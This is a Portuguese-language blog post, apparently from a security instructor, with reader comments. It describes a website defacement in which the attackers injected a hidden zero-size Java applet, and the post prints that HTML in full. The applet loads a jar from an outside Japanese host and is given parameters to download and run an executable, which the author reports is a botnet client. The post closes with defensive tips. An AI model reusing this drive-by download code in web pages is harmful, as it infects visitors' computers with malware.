Uma amiga foi surpreendida com um defacement em seu site. Até aí algo normal nos dias de hoje. Acontece que ela me passou uma informação bem interessante “A necessidade quanto a instalação do Java, última versão, para acessar o site”.
Mas como assim ?! Sites comuns estão rodando applets ou viram home-backing ?
Nops, nada disso.
Analisando o código html que foi postado no index.html da vítima, nós percebemos que a “molecada” ficou malandra. Vejam só:
<APPLET CODE = “Java.class” ARCHIVE = “http://fruru.jp/wp-includes/js/crop/atualizacao/Java.jar” WIDTH = “0” HEIGHT = “0”> <PARAM NAME = “url” VALUE = “http://fruru.jp/wp-includes/js/crop/atualizacao/atualizacao.exe”><PARAM NAME = “fn” VALUE = “javaw.exe”> <PARAM NAME = “rd” VALUE = “./indexx.php”></APPLET>
Infelizmente o host japonês tirou o site do ar e não podemos baixar o java.jar para iniciarmos o processo de análise. Mas as dicas são as seguintes:
- Tomem cuidado com os seus projetos web e façam um hardware adequado. Estou falando de instalar php-sushosin, atualização de pacotes e até mesmo em utilizar o Incapsula como frontend. Falamos disso no curso de segurança focado em wordpress, o qual rolou neste sábado.
- Não saíam instalado tudo que o seu browser manda. Vai que é uma praga virtual, como foi o caso deste carinha.
- E por último, anti-vírus + firewall instalados nos seu computador = mitigação de problemas.
que a força esteja com vocês.
P.S.: pesquisamos um pouco mais sobre o conteúdo deste arquivo java.jar, e descobrirmos que ele é um client de uma botnet. Maneiro hein..
joaopsouzar
20 abr 2013RT @gustcol: Defacement para propagar pragas. Alguma novidade ? #hacker #java http://t.co/Alr9GFWdEl
Leandro
20 abr 2013Parece que tem uma analise do malware veja só Gustavo http://unixfreaxjp.blogspot.com.br/
Gustavo Lima
20 abr 2013Acabei de ler e obrigado pela dica. Coloquei o link no google translator, não entendeu muito bem o japonês. 🙂
Alex Cardoso
21 abr 2013Alex Cardoso liked this on Facebook.